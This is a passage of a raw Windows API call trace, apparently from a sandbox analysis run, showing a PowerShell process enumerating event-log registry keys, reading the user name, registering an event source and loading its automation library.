lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.049] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x357e88, lpcchName=0x23e5bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x23e5bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.049] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x357e88, lpcchName=0x23e5bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x23e5bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.049] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x324) returned 0x0 [0153.049] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x0) returned 0x2 [0153.049] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x340) returned 0x0 [0153.049] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x0) returned 0x2 [0153.050] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x350) returned 0x0 [0153.050] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x0) returned 0x2 [0153.050] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x354) returned 0x0 [0153.050] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x0) returned 0x2 [0153.051] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x358) returned 0x0 [0153.051] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x0) returned 0x2 [0153.051] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x35c) returned 0x0 [0153.051] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x0) returned 0x2 [0153.051] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x360) returned 0x0 [0153.051] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x0) returned 0x2 [0153.052] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x364) returned 0x0 [0153.052] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x0) returned 0x2 [0153.052] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x368) returned 0x0 [0153.052] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e568 | out: phkResult=0x23e568*=0x36c) returned 0x0 [0153.052] RegCloseKey (hKey=0x36c) returned 0x0 [0153.052] RegCloseKey (hKey=0x320) returned 0x0 [0153.053] RegCloseKey (hKey=0x368) returned 0x0 [0153.167] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x348b88, nSize=0x23e6b4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x23e6b4) returned 0x1 [0153.168] GetLastError () returned 0x3 [0153.169] GetUserNameW (in: lpBuffer=0x357e88, pcbBuffer=0x23e6bc | out: lpBuffer="aETAdzjz", pcbBuffer=0x23e6bc) returned 1 [0153.343] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e51c | out: phkResult=0x23e51c*=0x320) returned 0x0 [0153.344] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x23e584, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x23e580, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x23e584*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x23e580*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.344] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.344] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.344] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.345] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.345] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.345] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.345] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.345] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.345] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.346] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x36c) returned 0x0 [0153.346] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.346] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x370) returned 0x0 [0153.346] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.346] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x374) returned 0x0 [0153.346] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.347] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x378) returned 0x0 [0153.347] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.347] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x37c) returned 0x0 [0153.347] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.347] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x380) returned 0x0 [0153.348] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.348] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x384) returned 0x0 [0153.348] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.348] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x388) returned 0x0 [0153.348] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.348] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x38c) returned 0x0 [0153.349] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x390) returned 0x0 [0153.349] RegCloseKey (hKey=0x390) returned 0x0 [0153.349] RegCloseKey (hKey=0x320) returned 0x0 [0153.349] RegCloseKey (hKey=0x38c) returned 0x0 [0153.349] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e51c | out: phkResult=0x23e51c*=0x38c) returned 0x0 [0153.349] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x23e584, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x23e580, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x23e584*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x23e580*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.350] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.350] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.350] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.350] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.350] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.350] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.351] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.351] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.351] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x357e88, lpcchName=0x23e5a0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x23e5a0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.351] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x320) returned 0x0 [0153.351] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.351] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x390) returned 0x0 [0153.352] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.352] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x394) returned 0x0 [0153.352] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.352] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x398) returned 0x0 [0153.352] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.353] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x39c) returned 0x0 [0153.353] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.353] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x3a0) returned 0x0 [0153.353] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.353] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x3a4) returned 0x0 [0153.354] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.354] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x3a8) returned 0x0 [0153.354] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x0) returned 0x2 [0153.354] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x3ac) returned 0x0 [0153.354] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e54c | out: phkResult=0x23e54c*=0x3b0) returned 0x0 [0153.355] RegCloseKey (hKey=0x3b0) returned 0x0 [0153.355] RegCloseKey (hKey=0x38c) returned 0x0 [0153.355] RegCloseKey (hKey=0x3ac) returned 0x0 [0153.355] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e510 | out: phkResult=0x23e510*=0x3ac) returned 0x0 [0153.356] RegQueryInfoKeyW (in: hKey=0x3ac, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x23e578, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x23e574, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x23e578*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x23e574*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.356] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x0, lpName=0x357e88, lpcchName=0x23e594, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x23e594, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.356] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x1, lpName=0x357e88, lpcchName=0x23e594, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x23e594, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.356] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x2, lpName=0x357e88, lpcchName=0x23e594, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x23e594, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.356] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x3, lpName=0x357e88, lpcchName=0x23e594, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x23e594, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.357] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x4, lpName=0x357e88, lpcchName=0x23e594, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x23e594, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.357] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x5, lpName=0x357e88, lpcchName=0x23e594, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x23e594, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.357] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x6, lpName=0x357e88, lpcchName=0x23e594, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x23e594, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.357] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x7, lpName=0x357e88, lpcchName=0x23e594, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x23e594, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.357] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x8, lpName=0x357e88, lpcchName=0x23e594, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x23e594, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0153.358] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x38c) returned 0x0 [0153.358] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x0) returned 0x2 [0153.358] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x3b0) returned 0x0 [0153.359] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x0) returned 0x2 [0153.359] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x3b4) returned 0x0 [0153.360] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x0) returned 0x2 [0153.360] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x3b8) returned 0x0 [0153.360] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x0) returned 0x2 [0153.360] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x3bc) returned 0x0 [0153.360] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x0) returned 0x2 [0153.360] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x3c0) returned 0x0 [0153.361] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x0) returned 0x2 [0153.361] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x3c4) returned 0x0 [0153.361] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x0) returned 0x2 [0153.361] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x3c8) returned 0x0 [0153.361] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x0) returned 0x2 [0153.362] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x3cc) returned 0x0 [0153.362] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e540 | out: phkResult=0x23e540*=0x3d0) returned 0x0 [0153.362] RegCloseKey (hKey=0x3d0) returned 0x0 [0153.362] RegCloseKey (hKey=0x3ac) returned 0x0 [0153.362] RegCloseKey (hKey=0x3cc) returned 0x0 [0153.422] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4e90004 [0153.425] GetLastError () returned 0x0 [0153.427] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3218778*="WSMan", lpRawData=0x3218620) returned 1 [0153.430] GetLastError () returned 0x0 [0153.431] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.431] GetLastError () returned 0xcb [0153.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e0b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.432] GetLastError () returned 0xcb [0153.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.432] GetLastError () returned 0xcb [0153.432] GetFullPathNameW (in: 